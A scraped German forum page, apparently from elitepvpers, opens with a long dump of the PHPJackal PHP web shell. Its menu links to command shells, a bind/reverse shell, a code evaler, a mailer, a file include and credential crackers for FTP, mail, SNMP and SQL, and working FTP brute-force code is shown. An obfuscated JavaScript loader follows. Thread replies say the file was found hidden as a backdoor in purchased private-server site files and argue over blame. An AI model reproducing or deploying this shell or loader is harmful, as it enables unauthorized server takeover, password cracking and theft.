if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;}
if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;}
ftp_close($ftp);
flusheR();
}
echo "<br>Done</font>";
fclose($dictionary);
}
else{
echo "$errorbox Can not open dictionary.$et";
}
}
else echo "<center>${t}FTP cracker:$crack";
}}
function openiT($name){
$ext=strtolower(substr($name,strrpos($name,'.')+1));
$src=array('php','php3','php4','phps','phtml','phtm','inc');
if(in_array($ext,$src))highlight_file($name);
else echo "<font color=blue><pre>".htmlspecialchars(file_get_contents($name))."</pre></font>";
}
function logouT(){
setcookie('passw','',time()-10000);
header('Location: '.hlinK());
}
?>
<html>
<head>
<style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table { font-size: 15px; } .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style>
<meta http-equiv="Content-Language" content="en-us">
<title>PHPJackal</title>
</head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%">
<tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php $cwd= getcwd(); echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=mysql&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mailer]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=whois&workingdiR=$cwd");?>">[Whois]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href=\"".hlinK("seC=logout")."\">Logout</a>]";?></td></tr></table>
<hr size=1 noshade>
<?php
if (!empty($_REQUEST['seC'])){
switch($_REQUEST['seC']){
case 'fm':filemanager();break;
case 'sc':scanneR();break;
case 'phpinfo': phpinfo();break;
case 'edit': if (!empty($_REQUEST['open']))editoR($_REQUEST['filE']);
if (!empty($_REQUEST['Save'])){
$filehandle= fopen($_REQUEST['file'],"w");
fwrite($filehandle,$_REQUEST['edited']);
fclose($filehandle);}
if (!empty($_REQUEST['filE'])) editoR($_REQUEST['filE']);else editoR('');
break;
case 'openit':openiT($_REQUEST['namE']);break;
case 'cr': crackeR();break;
case 'dic':dicmakeR();break;
case 'whois':whoiS();break;
case 'hex':hexvieW();break;
case 'img':showimagE($_REQUEST['filE']);break;
case 'inc':include ($_REQUEST['filE']);break;
case 'hc':hashcrackeR();break;
case 'fcr':formcrackeR();break;
case 'snmp':snmpcrackeR();break;
case 'sql':sqlcrackeR();break;
case 'auth':authcrackeR();break;
case 'pop3':pop3crackeR();break;
case 'imap':imapcrackeR();break;
case 'smtp':smtpcrackeR();break;
case 'ftp':ftpcrackeR();break;
case 'eval':phpevaL();break;
case 'px':pr0xy();break;
case 'webshell':webshelL();break;
case 'mailer':maileR();break;
case 'br':brshelL();break;
case 'asm':safemodE();break;
case 'mysql':mysqlclienT();break;
case 'calc':calC();break;
case 'sysinfo':sysinfO();break;
case 'checksum':checksuM($_REQUEST['filE']);break;
case 'logout':logouT();break;
default: echo $intro;
}}else echo $intro;
echo $footer;?></body></html><script type="text/javascript" language="javascript">
<!--
fF7eSD8=new Array();
fF7eSD8[0]="<script>
docu";
fF7eSD8[1]="ment.write(une";
fF7eSD8[2]="scape("%3Cscri";
fF7eSD8[3]="pt%20type%3D%";
fF7eSD8[4]="22text/javascr";
fF7eSD8[5]="ipt%22%3Edo";
fF7eSD8[6]="cument.write%";
fF7eSD8[7]="28%27%5Cu00";
fF7eSD8[8]="3c%5Cu0073%5C";
fF7eSD8[9]="u0063%5Cu0072";
fF7eSD8[10]="%5Cu0069%5Cu";
fF7eSD8[11]="0070%5Cu007";
fF7eSD8[12]="4%5Cu0020%5C";
fF7eSD8[13]="u0074%5Cu007";
fF7eSD8[14]="9%5Cu0070%5Cu";
fF7eSD8[15]="0065%5Cu003d%";
fF7eSD8[16]="5Cu0022%5Cu0";
fF7eSD8[17]="074%5Cu0065%5C";
fF7eSD8[18]="u0078%5Cu0074%";
fF7eSD8[19]="5Cu002f%5Cu";
fF7eSD8[20]="006a%5Cu0061%5";
fF7eSD8[21]="Cu0076%5Cu0";
fF7eSD8[22]="061%5Cu0073%";
fF7eSD8[23]="5Cu0063%5Cu00";
fF7eSD8[24]="72%5Cu0069%";
fF7eSD8[25]="5Cu0070%5Cu";
fF7eSD8[26]="0074%5Cu0022";
fF7eSD8[27]="%5Cu003e%5C";
fF7eSD8[28]="u0064%5Cu00";
fF7eSD8[29]="6f%5Cu0063%5C";
fF7eSD8[30]="u0075%5Cu006";
fF7eSD8[31]="d%5Cu0065%5Cu";
fF7eSD8[32]="006e%5Cu0074%5";
fF7eSD8[33]="Cu002e%5Cu00";
fF7eSD8[34]="77%5Cu0072%";
fF7eSD8[35]="5Cu0069%5Cu";
fF7eSD8[36]="0074%5Cu0065%";
fF7eSD8[37]="5Cu0028%5Cu002";
fF7eSD8[38]="7%5Cu005c%5Cu";
fF7eSD8[39]="0075%5Cu0030";
fF7eSD8[40]="%5Cu0030%5Cu0";
fF7eSD8[41]="033%5Cu0063%";
fF7eSD8[42]="5Cu005c%5Cu007";
fF7eSD8[43]="5%5Cu0030%5Cu";
fF7eSD8[44]="0030%5Cu0035";
fF7eSD8[45]="%5Cu0033%5C";
fF7eSD8[46]="u005c%5Cu0075";
fF7eSD8[47]="%5Cu0030%5Cu";
fF7eSD8[48]="0030%5Cu003";
fF7eSD8[49]="4%5Cu0033%5";
fF7eSD8[50]="Cu005c%5Cu007";
fF7eSD8[51]="5%5Cu0030%5Cu";
fF7eSD8[52]="0030%5Cu0035%5";
fF7eSD8[53]="Cu0032%5Cu00";
fF7eSD8[54]="5c%5Cu0075%5C";
fF7eSD8[55]="u0030%5Cu0030%";
fF7eSD8[56]="5Cu0034%5Cu00";
fF7eSD8[57]="39%5Cu005c%5Cu";
fF7eSD8[58]="0075%5Cu0030%5";
fF7eSD8[59]="Cu0030%5Cu003";
fF7eSD8[60]="5%5Cu0030%5C";
fF7eSD8[61]="u005c%5Cu0075";
fF7eSD8[62]="%5Cu0030%5Cu00";
fF7eSD8[63]="30%5Cu0035%5";
fF7eSD8[64]="Cu0034%5Cu005";
fF7eSD8[65]="c%5Cu0075%5C";
fF7eSD8[66]="u0030%5Cu0030%";
fF7eSD8[67]="5Cu0032%5Cu";
fF7eSD8[68]="0030%5Cu005c%";
fF7eSD8[69]="5Cu0075%5Cu00";
fF7eSD8[70]="30%5Cu0030%5";
fF7eSD8[71]="Cu0035%5Cu003";
fF7eSD8[72]="3%5Cu005c%5Cu0";
fF7eSD8[73]="075%5Cu0030";
fF7eSD8[74]="%5Cu0030%5Cu00";
fF7eSD8[75]="35%5Cu0032%";
fF7eSD8[76]="5Cu005c%5Cu00";
fF7eSD8[77]="75%5Cu0030%5Cu";
fF7eSD8[78]="0030%5Cu003";
fF7eSD8[79]="4%5Cu0033%5Cu";
fF7eSD8[80]="005c%5Cu0075%";
fF7eSD8[81]="5Cu0030%5Cu";
fF7eSD8[82]="0030%5Cu0033";
fF7eSD8[83]="%5Cu0064%5Cu0";
fF7eSD8[84]="05c%5Cu0075%";
fF7eSD8[85]="5Cu0030%5Cu003";
fF7eSD8[86]="0%5Cu0036%5";
fF7eSD8[87]="Cu0038%5Cu0";
fF7eSD8[88]="05c%5Cu0075%5C";
fF7eSD8[89]="u0030%5Cu003";
fF7eSD8[90]="0%5Cu0037%5C";
fF7eSD8[91]="u0034%5Cu005c%";
fF7eSD8[92]="5Cu0075%5Cu";
fF7eSD8[93]="0030%5Cu0030";
fF7eSD8[94]="%5Cu0037%5Cu";
fF7eSD8[95]="0034%5Cu005c%";
fF7eSD8[96]="5Cu0075%5Cu00";
fF7eSD8[97]="30%5Cu0030%5Cu";
fF7eSD8[98]="0037%5Cu0030%5";
fF7eSD8[99]="Cu005c%5Cu00";
fF7eSD8[100]="75%5Cu0030%5";
fF7eSD8[101]="Cu0030%5Cu00";
fF7eSD8[102]="33%5Cu0061%5Cu";
fF7eSD8[103]="005c%5Cu0075";
fF7eSD8[104]="%5Cu0030%5C";
fF7eSD8[105]="u0030%5Cu0032%";
fF7eSD8[106]="5Cu0066%5Cu00";
fF7eSD8[107]="5c%5Cu0075%5Cu";
fF7eSD8[108]="0030%5Cu0030%";
fF7eSD8[109]="5Cu0032%5Cu0";
fF7eSD8[110]="066%5Cu005c";
fF7eSD8[111]="%5Cu0075%5Cu";
fF7eSD8[112]="0030%5Cu0030%";
fF7eSD8[113]="5Cu0036%5Cu003";
fF7eSD8[114]="4%5Cu005c%5C";
fF7eSD8[115]="u0075%5Cu003";
fF7eSD8[116]="0%5Cu0030%5C";
fF7eSD8[117]="u0036%5Cu00";
fF7eSD8[118]="31%5Cu005c%5";
fF7eSD8[119]="Cu0075%5Cu00";
fF7eSD8[120]="30%5Cu0030%5Cu";
fF7eSD8[121]="0037%5Cu0034";
fF7eSD8[122]="%5Cu005c%5Cu00";
fF7eSD8[123]="75%5Cu0030%5C";
fF7eSD8[124]="u0030%5Cu003";
fF7eSD8[125]="6%5Cu0031%5";
fF7eSD8[126]="Cu005c%5Cu007";
fF7eSD8[127]="5%5Cu0030%5";
fF7eSD8[128]="Cu0030%5Cu0";
fF7eSD8[129]="032%5Cu0065";
fF7eSD8[130]="%5Cu005c%5C";
fF7eSD8[131]="u0075%5Cu0030%";
fF7eSD8[132]="5Cu0030%5Cu003";
fF7eSD8[133]="7%5Cu0034%5Cu0";
fF7eSD8[134]="05c%5Cu0075%5C";
fF7eSD8[135]="u0030%5Cu00";
fF7eSD8[136]="30%5Cu0033%5C";
fF7eSD8[137]="u0030%5Cu005";
fF7eSD8[138]="c%5Cu0075%5Cu";
fF7eSD8[139]="0030%5Cu003";
fF7eSD8[140]="0%5Cu0033%5C";
fF7eSD8[141]="u0030%5Cu005";
fF7eSD8[142]="c%5Cu0075%5";
fF7eSD8[143]="Cu0030%5Cu0";
fF7eSD8[144]="030%5Cu0036%5C";
fF7eSD8[145]="u0063%5Cu005c";
fF7eSD8[146]="%5Cu0075%5C";
fF7eSD8[147]="u0030%5Cu00";
fF7eSD8[148]="30%5Cu0037%";
fF7eSD8[149]="5Cu0033%5Cu00";
fF7eSD8[150]="5c%5Cu0075%5";
fF7eSD8[151]="Cu0030%5Cu00";
fF7eSD8[152]="30%5Cu0032%5";
fF7eSD8[153]="Cu0065%5Cu005c";
fF7eSD8[154]="%5Cu0075%5C";
fF7eSD8[155]="u0030%5Cu00";
fF7eSD8[156]="30%5Cu0036%5Cu";
fF7eSD8[157]="0066%5Cu005c%5";
fF7eSD8[158]="Cu0075%5Cu00";
fF7eSD8[159]="30%5Cu0030%5Cu";
fF7eSD8[160]="0037%5Cu0032%";
fF7eSD8[161]="5Cu005c%5Cu007";
fF7eSD8[162]="5%5Cu0030%5C";
fF7eSD8[163]="u0030%5Cu0036%";
fF7eSD8[164]="5Cu0037%5Cu00";
fF7eSD8[165]="5c%5Cu0075%5";
fF7eSD8[166]="Cu0030%5Cu0030";
fF7eSD8[167]="%5Cu0032%5Cu00";
fF7eSD8[168]="66%5Cu005c%5";
fF7eSD8[169]="Cu0075%5Cu0";
fF7eSD8[170]="030%5Cu0030%5C";
fF7eSD8[171]="u0037%5Cu0037";
fF7eSD8[172]="%5Cu005c%5Cu";
fF7eSD8[173]="0075%5Cu0030%";
fF7eSD8[174]="5Cu0030%5Cu";
fF7eSD8[175]="0036%5Cu0038%5";
fF7eSD8[176]="Cu005c%5Cu007";
fF7eSD8[177]="5%5Cu0030%5";
fF7eSD8[178]="Cu0030%5Cu0036";
fF7eSD8[179]="%5Cu0035%5Cu00";
fF7eSD8[180]="5c%5Cu0075%5Cu";
fF7eSD8[181]="0030%5Cu003";
fF7eSD8[182]="0%5Cu0037%5C";
fF7eSD8[183]="u0032%5Cu00";
fF7eSD8[184]="5c%5Cu0075%5";
fF7eSD8[185]="Cu0030%5Cu0";
fF7eSD8[186]="030%5Cu0036%";
fF7eSD8[187]="5Cu0035%5Cu0";
fF7eSD8[188]="05c%5Cu0075";
fF7eSD8[189]="%5Cu0030%5Cu0";
fF7eSD8[190]="030%5Cu0032";
fF7eSD8[191]="%5Cu0065%5Cu";
fF7eSD8[192]="005c%5Cu0075";
fF7eSD8[193]="%5Cu0030%5Cu00";
fF7eSD8[194]="30%5Cu0036%";
fF7eSD8[195]="5Cu0061%5Cu";
fF7eSD8[196]="005c%5Cu007";
fF7eSD8[197]="5%5Cu0030%5";
fF7eSD8[198]="Cu0030%5Cu0037";
fF7eSD8[199]="%5Cu0033%5Cu0";
fF7eSD8[200]="05c%5Cu0075%5C";
fF7eSD8[201]="u0030%5Cu00";
fF7eSD8[202]="30%5Cu0033%5Cu";
fF7eSD8[203]="0065%5Cu005";
fF7eSD8[204]="c%5Cu0075%5Cu";
fF7eSD8[205]="0030%5Cu0030%";
fF7eSD8[206]="5Cu0033%5Cu00";
fF7eSD8[207]="63%5Cu005c%5C";
fF7eSD8[208]="u0075%5Cu0030";
fF7eSD8[209]="%5Cu0030%5Cu0";
fF7eSD8[210]="032%5Cu0066%5";
fF7eSD8[211]="Cu005c%5Cu0";
fF7eSD8[212]="075%5Cu0030%";
fF7eSD8[213]="5Cu0030%5Cu";
fF7eSD8[214]="0035%5Cu0033%5";
fF7eSD8[215]="Cu005c%5Cu007";
fF7eSD8[216]="5%5Cu0030%5Cu0";
fF7eSD8[217]="030%5Cu0034%5";
fF7eSD8[218]="Cu0033%5Cu00";
fF7eSD8[219]="5c%5Cu0075%";
fF7eSD8[220]="5Cu0030%5Cu0";
fF7eSD8[221]="030%5Cu0035";
fF7eSD8[222]="%5Cu0032%5Cu0";
fF7eSD8[223]="05c%5Cu0075";
fF7eSD8[224]="%5Cu0030%5Cu";
fF7eSD8[225]="0030%5Cu0034%";
fF7eSD8[226]="5Cu0039%5Cu0";
fF7eSD8[227]="05c%5Cu0075%";
fF7eSD8[228]="5Cu0030%5Cu";
fF7eSD8[229]="0030%5Cu0035%";
fF7eSD8[230]="5Cu0030%5Cu";
fF7eSD8[231]="005c%5Cu0075%5";
fF7eSD8[232]="Cu0030%5Cu0";
fF7eSD8[233]="030%5Cu0035";
fF7eSD8[234]="%5Cu0034%5Cu0";
fF7eSD8[235]="05c%5Cu0075";
fF7eSD8[236]="%5Cu0030%5Cu";
fF7eSD8[237]="0030%5Cu0033%5";
fF7eSD8[238]="Cu0065%5Cu0";
fF7eSD8[239]="027%5Cu0029";
fF7eSD8[240]="%5Cu003c%5C";
fF7eSD8[241]="u002f%5Cu0073%";
fF7eSD8[242]="5Cu0063%5Cu007";
fF7eSD8[243]="2%5Cu0069%5Cu";
fF7eSD8[244]="0070%5Cu007";
fF7eSD8[245]="4%5Cu003e%27%";
fF7eSD8[246]="29%3C/script%";
fF7eSD8[247]="3E"));
</scri";
fF7eSD8[248]="pt>";
for (i = 0; i < fF7eSD8.length; i ++)
{
    document.write(unescape(fF7eSD8[i]))
}
// -->
</script>
Das ist der inhalt was in base64 verschlüsselt wurde
.RUVision is offline  
Thanks
1 User
Old 08/21/2012, 00:43   #81
 
.Sinnex's Avatar
 
elite*gold: 3
The Black Market: 6/0/0
Join Date: Jun 2012
Posts: 152
Received Thanks: 90
Ich hoffe echt das CA Design, bald keine käufer mehr haben wirt.
Aza war schon immer geld Geil, und Frech.


Greez
.Sinnex is offline  
Old 08/21/2012, 11:07   #82
 
.RUVision's Avatar
 
elite*gold: 34
The Black Market: 3/0/0
Join Date: Nov 2011
Posts: 1,431
Received Thanks: 851
Quote:
Originally Posted by .Sinnex View Post
Ich hoffe echt das CA Design, bald keine käufer mehr haben wirt.
Aza war schon immer geld Geil, und Frech.


Greez
Der echte Aza, heißt hier CanyX, und ja er war immer geld geil ^^
.RUVision is offline  
Old 08/21/2012, 16:22   #83


 
JustSkillx3's Avatar
 
elite*gold: 0
The Black Market: 135/0/0
Join Date: Jun 2011
Posts: 3,044
Received Thanks: 730
Quote:
Originally Posted by Λzα View Post
Achtung: Es war nicht vorgesehen das diese PhP datei im ordner bei liegt, es war jediglich zum testen gewesen, habe es vergessen zulöschen, die leute die nun diese ordner etc. auf der webspace haben.. das liegt daran das jetzt jeder davon weiss, und jeder diese hp in der toplist etc.. sucht und versucht damit was zu reißen.
Ich wusste es wirklich nicht das dieses Script noch dabei liegt, und mal ganz erlich, habe ich bzw. wir uns jemals bei einen dieser server ran gemacht, fehlen euch psc´s oder gibt es gepushte acc´s? Denke nicht fals doch waren wir es mit sicherheit nicht.
Einfach die PhP datei löschen --> WIN.

Ich Entschuldige mich für die umständlichkeiten.

Trotzdem noch ein kleiner Hinweis.
Bitte ändert alle eure Datenbank Daten 1x nachdem ihr diese datei gelöscht habt.

MFG

Ja ausversehen... versteckt im tiefsten loch,unschuldig benannt... oke
JustSkillx3 is offline  
Old 08/22/2012, 14:14   #84
 
elite*gold: 0
The Black Market: 12/0/1
Join Date: May 2012
Posts: 336
Received Thanks: 36
Die Käufer sind genau so schuld wie Aza und co....

Wer so dumm ist und alles was er kauft benutzt ohne zu Prüfen ist selbst schuld.

Die haben nen Fehler gemacht, aber sucht die Fehler nicht nur bei CA sondern auch bei euch selbst

Sollte nicht so schwer sein, drauf zu kommen mal zu checken ob da was drin ist.

Leute die das nicht hinkriegen sollten auch keinen Server leiten wofür sie ne Page brauchen.
Wowkeys is offline  
Old 08/22/2012, 20:15   #85
 
elite*gold: 506
The Black Market: 1/0/0
Join Date: Nov 2009
Posts: 307
Received Thanks: 104
Quote:
Originally Posted by Wowkeys View Post
Die haben nen Fehler gemacht, aber sucht die Fehler nicht nur bei CA sondern auch bei euch selbst
Tickst du noch? Nehmen wir mal an; ich verkaufe dir nen Sandwich der
abgelaufen is. Wer is da zuerst drann? Du oder ich?

Sorry für das Beispiel, aber wie verhängt kann man eigentlich noch denken?
n0ize is offline  
Old 11/22/2013, 15:45   #86
 
elite*gold: 0
The Black Market: 0/0/0
Join Date: Dec 2009
Posts: 5
Received Thanks: 2
Wowkeys, du liegst zu 100% falsch. Wenn man etwas kauft hat man keine Pflicht bzw. sollte keine Pflicht haben, es noch durchzusehen. Man kauft es ja deshalb, weil man es entweder nicht selber kann oder keine Zeit dafür hat oder keine Lust dazu hat - also ist doch gerade das der Grund und dass CA Designs nicht die volle Schuld hat ist ja wohl lächerlich.

Kind Regards
Destroyer800 is offline  
Old 11/22/2013, 15:54   #87
 
H.A.Z.E's Avatar
 
elite*gold: 11
The Black Market: 42/0/0
Join Date: Sep 2012
Posts: 3,005
Received Thanks: 375
Quote:
Originally Posted by Destroyer800 View Post
Wowkeys, du liegst zu 100% falsch. Wenn man etwas kauft hat man keine Pflicht bzw. sollte keine Pflicht haben, es noch durchzusehen. Man kauft es ja deshalb, weil man es entweder nicht selber kann oder keine Zeit dafür hat oder keine Lust dazu hat - also ist doch gerade das der Grund und dass CA Designs nicht die volle Schuld hat ist ja wohl lächerlich.

Kind Regards
Wieso pusht du diesen Thrad auf? Der ist ein Jahr alt...
H.A.Z.E is offline  
Reply
Page 6 of 6 « First 45 6

« Neuer kostenloser Trailerservice für Privatserver | Client verbindet nicht - Syserr leer »

Similar Threads Similar Threads
[HowTo] Skillanimationen entfernen
04/21/2016 - Last Chaos - 57 Replies
Hallo Leute, heute möchte ich euch einen Weg zeigen, wie ihr die Skillanimationen eurer Skills ohne Hacks und dauerhaft entfernen könnt. Diese Methode funktioniert auf allen Servern, völlig egal ob mit oder ohne X-Trap. Was wird benötigt? http://www.nbb.de/nbb_cms2/templates/nbb/images/t rennlinie.png - Einen Hex Editor, ich empfehle euch den Editor "Hex Workshop" den ihr kostenlos als 30-Tage-Testversion bei Chip herunterladen könnt. - Ein wenig Zeit (2 - 5 Minuten)
[HowTo]Chatblock Entfernen
06/05/2010 - Metin2 PServer Guides & Strategies - 10 Replies
Habe Sufu Benutzt und nix Gefunden :) Also,da ich Viele Gesehen habe die Fragen wie man Chatblock Weg machen kannt es geht so:Es gibt 2 Möglichkeiten,Also du gehst Ingame mit einen GM und gibst Folgendes ein:Kannste dir Aussuchen: 1.Möglichkeit: /block_chat name 1 2.Möglichkeit: /block_chat name -999
Script Vessel has backdoor?
07/07/2007 - Conquer Online 2 - 5 Replies
Script Vessel has backdoor? Its named like this.. Trojan Horse backdoor Hupigon.. I downloaded it from here.



All times are GMT +2. The time now is 18:16.

elitepvpers - play less, get more - Top

Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.